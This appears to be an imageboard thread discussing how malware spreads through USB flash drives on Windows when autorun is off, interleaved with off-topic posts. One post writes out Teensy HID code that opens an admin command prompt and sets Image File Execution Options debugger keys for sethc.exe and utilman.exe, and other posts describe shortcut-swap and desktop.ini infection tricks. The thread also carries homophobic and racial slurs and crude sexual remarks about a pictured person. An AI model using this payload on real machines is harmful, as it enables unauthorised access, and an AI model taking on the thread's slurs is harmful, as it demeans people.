Malware

How do malware infect windows machine through USB flash drive if you disable autorun?

i'd like to infect her (male) with my malware if you know what i mean ;)

Them's child rearin' hips yew faggot. Learn to women.

That's one hell of a body.

How can you seriously like a shitty anime thats like 30 years old when we write two thousand seventeen. Its getting beyond stale. Can we outlaw manchildren somehow? The future of the white race depends on it.

Loading icons for DLL files in Explorer required loading them and executing Init function. It was fixed since I do not know when.

>Loading icons for DLL files in Explorer required loading them and executing Init function
So part of the malware needs to be DLL file?
And does that mean to excute the malware you'd need to open the drive?
Wouldn't using another file explorer solve that?

Yes.
Yes.
Most likely not because icon loading is ofenly borrowed from Win32. Read last sentence of my previous post.

You need to go back

Also, you can fix this manually by disabling all DLL custom icons.
HKCR/dllfile/DefaultIcon should not contain % signs.

>How do malware infect windows machine through USB flash drive if you disable autorun?
Most people don't disable autorun. When you make malware, you're normally not making it to infect the 1% to 5% of the people who take proactive steps to be secure. You're targeting the 99% to 95% of people who don't.
The exception to this is if you're the CIA or some shit and targeting specific individuals or foreign government systems.

I've read that, but I still find some infected USB flash drives.
Maybe they don't update then?
Nice.
>Most people don't disable autorun
That's true for XP/Vista/Win7, but from Win 8 it should be disabled by default.

You clearly don't belong here.

Someone out there came on this belly.
Literally how can I continue with my life, knowing this?

cute boy~

And I'd like to add to my previous post, that if you are so pathetic as to like Neon Genesis Evangelion in Anno Domini 2000 and fucking 17, then liking any of those positively retarded girls - Asuka or the blue headed one - is barely better than being a literal horsefucker. The only one which is *maybe* acceptable for a well-adjusted adult is that purple haired milf.

The usb stick can pretend to be whatever device, or even multiple ones at the same time. Like a keyboard and mouse that automatically do a sequence of key presses and mouse clicks when plugged in.

>Maybe they don't update then?
This and autorun and

that fucking malware which replaces folders with executables with same names and hides folders (with hidden attribute). After flash drive goes through one XP machine with nothing secure, it's enough to click any of those, even on 7 probably.

This.

Hand over the sauce now

That's assuming the USB flash drive spoof HID ID, which is on firmware level.
And in that case OS doesn't really matter at this point, unless you use OS that doesn't support USB HID.

If this is a girl then I'd fuck the shit out of her. If this is a boy then I'd fuck the shit out of him

>malware which replaces folders with executables with same names and hides folders
That clever, since many people don't enable "Show extension for known file types".
So if a machine that have autorun disabled, and you've noticed the swap and didn't run the malware you'd be safe?
I also assume the original folders won't be simply hidden, it might even be system attribute added to it.

wtf i am a faggot now

>So if a machine that have autorun disabled, and you've noticed the swap and didn't run the malware you'd be safe?
Windows is a shitload of legacy code. You are never safe until proven so.
There was no indication of DLL icon vulnerability since almost all DLLs had same icons built in and nobody thought that windows could be calling DLL to get icon.
>I also assume the original folders won't be simply hidden,
Properties->Hidden

Give me the salsa m80

THIS.
I have old XP machine that I use it to control a waterjet cutter.
Many customers come in with USB flash drive infected with various malwares.
However I discovered that windows might have a new way to set the hidden attribute.
Since the folder icon was changed to that of a volume, and can't be unhidden.
I had to delete it.

It doesnt.

>Liking biological females is almost as bad as wanting to fuck a horse
Here's your (you).

>Completely retarded moetron which indeed started the retard-moe trend 10 years before it became a thing
>Even more retarded obnoxious tsunderetron which started the obnoxious baka-baka-baka tsundere trend 10 years before it became a thing
>Also 2d anime characters
>biological females

(((((((((((((((((((((((((((((((((((Thats bait)))))))))))))))))))))))))))))))

Don't post OP images that are more interesting than your topic

>fapping to male asuka
faggots go fap to kawaru

p-please be a trap

Kys my man

Driver Hijack.

Autorun got replaced with redirects in early 2013.

>redirects in early 2013
Example?

>Infected PC creates shortcuts for all files, and makes a hidden folder with a blank filename that will store the original files and a executable file/Installer
>Shortcuts open the malware installer disguised as the device drivers and the original file
>90% of people never notice their USB is infected

I understood the first part but why device driver?

So the malware can be executed without having to deal with UAC.

I see, in that case the best way to protect yourself from that is to check file extensions and disable autorun?

Pretty much.
You should be able to rescue the USB and get rid of the malware easy anyway all you need are 2 commands.

Its common sense to always check what are you running.

The best way to save yourself is to
install gentoo
You wouldn't go to sleep with your head inside a guillotine, would you?

>2 commands
del and attrib ?

>run Linux
>never need to worry about this shit

Isn't linux susceptible to autorun virus? especially if you have WINE installed?

Many distros auto mount flash drives but don't autorun

What's the difference?

Mounting just means it's accessible to the root filesystem for reading and writing

So opening the mounted volume with explorer doesn't execute the malware even if you have WINE installed?

It might
Wine definitely introduces vulnerabilities

>what is potatoshop

If I remember correctly all the files are hidden in a system permission folder with filename that is alt+0160/NBSP character that is like space [ ] but actually not similar. It won't delete files because that would trigger UAC. Just hides it and infects every shit it can.
noobs are baited to click the dummy shortcuts.lnk files which will:
open the malware and infect the local pc
open the shortcut to the folder or file so it won't be suspisious
The problem is when people try to copy/download that shortcut which isn't the actual file.

The malware sometimes just points to a native system32 command that will parse a binary that is hidden in the flash drive OR some garbled text file that is encoded to some shit to avoid detection.

Easy fix is to make a file with alt+0160 and give it a system permission so the virus wouldn't be able to hide your files (like the autorun.inf folder hacky fix)

there's another one which utilizes desktop.ini
it would:
>read the icon
>that is actually a malware
>no user intervention/autorun required, infected the moment you plug it in
it's very rare virus though but really clever

cute belly

>desktop.ini
That's genius.
GNU/Linux utilize .ini files as well, does that makes it vulnerable?

Same malware prevents showing hidden files in Explorer.

Memes aside, is that a girl or a girl(female)?

>people in this thread say its a guy

[spoiler] it only makes me harder [/spoiler]

Based on the hips and the accuracy of the photo, I would say this is a woman. Usually when the hips are gimped there's some level inaccuracy with the vertical lines. I've highlighted some key lines in gimp here to emphasize the correctness. The only concern here is a rather large, uniform white spot around the hip that could indicate error correction. It's still somewhat up in the air, but my vote is female.

>no penis

Dropped

Wow.

Could we stop USB HID software by presenting a prompt when a "keyboard" is plugged in? Like a captcha to prove you're real human bean, so that if it starts typing bullshit, the PC will know this nigga ain't a real keyboard.

You should go to the Facebook Linux Memes group. You'd get along great over there.

Again Sup Forums can't into the humans

It isn't that autorun is the most dangerous, but it is the easiest that retards can do to get files into a network. The user is going to run the malware they bring in. USB is a nice target since it avoids all email, firewall (read website filtering) and the false sense of security that it came from my machine at home.

inb4 you can do X. We are talking about users who can't common sense 2017

off yourself my dude

WHERES THE FUCKING SOURCE

I feel sorry for your mother.

I'd ssh into her MySQL server if you know what I mean.

something not done to this image

you mean give her a hot SQL Injection?

>this thread
Remember when you didn't have to assume every womanlike figure was some kind of trap or freak? I hate this timeline. I want to go back.

Back to Argentina with you

same way that your pic is a trap

Finally. I've been wondering how these shitty desktop.ini files were related to persistence. The flavour I've been dealing with uses bogus System Volume Information folders, too.

WHO IS OP'S SEMEN DEMON

>dont like my retard imaginary girlfriend
>written by infamous hack
Hideaki Anno
>GET OFF MY BOARD

>>Sup Forums
>>/1990s/

This user gets it. I use a teensy sometimes on physical pen tests because they're so cheap.

#define TEENSY3
#ifdef TEENSY2
#include
#endif

#define REG_Sethc "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"\" /f"
#define REG_Utilman "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe\" /v Debugger /t REG_SZ /d \"\" /f"

void setup(){
delay(3000);
wait_for_drivers(2000);

minimise_windows();
delay(500);
while(!cmd_admin(3,500))
{
reset_windows_desktop(2000);
}
Keyboard.println(REG_Sethc);
delay(3000);
Keyboard.println(REG_Utilman);
delay(2000);
Keyboard.println("exit");

}

void loop() {

}

void wait_for_drivers(int sleep)
{
bool CapsLockTrap = is_caps_on();
while(CapsLockTrap == is_caps_on())
{
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(500);
delay(sleep);
}

The fuck kind of argument is "like 30 years old"? Are you going to call Shakespeare a hack next?

Other than those.
The hidden files/folder doesn't appear when plugging the infected flash drive into Linux.

>OS that doesn't support USB HID
Like what?

>common sense 2017
What do you recommend?
Hot gluing every USB port isn't an option, and sometimes you need to lend USB flash drive to someone.

>desktop.ini files
I've opend on of these and there was only gibberish in there.
>System Volume Information folders
That and RECYCLE as well.

Source of this Asuka pls

HURR DURR Y U NO LIEK WAT I LIEK

are you seriously calling people pathetic, and in the same post casting your vote on who you'd fuck from an anime?

who is that
source please

Symbian.

WHERE IS THE SAUCE?!

>desktop.ini
I thought that effect folder appearance when you open that folder.
Autorun.inf does the icon change thing.

Who is this woman

It's a dude

Who is this Slime Slurper?

Searching the image didn't give me results, OP. I beg for your source. Also is this a girl (female) or a girl (male)?

Who is this dude?

it's not a dude for fucks sakes, it's a beatiful woman

It's ok if you think guys are beautiful.
There's nothing weird about that these days.

Teensy + shell code payload

Something like McAfee device control can lock down all the USBs. Have a process through IT if you really need to use a USB.

>"Good afternoon, IT guy, I have this USB flash drive can you see if it's safe?"
>*show generous amount of cleavage as a motivation*
>3 hours later, the USB flash drive is missing the IT room smells like squid

what can I say. I like putting USBs in my ass and rocketing them out so I can hear the "ting" as it hits the side toilet.

>"male semen"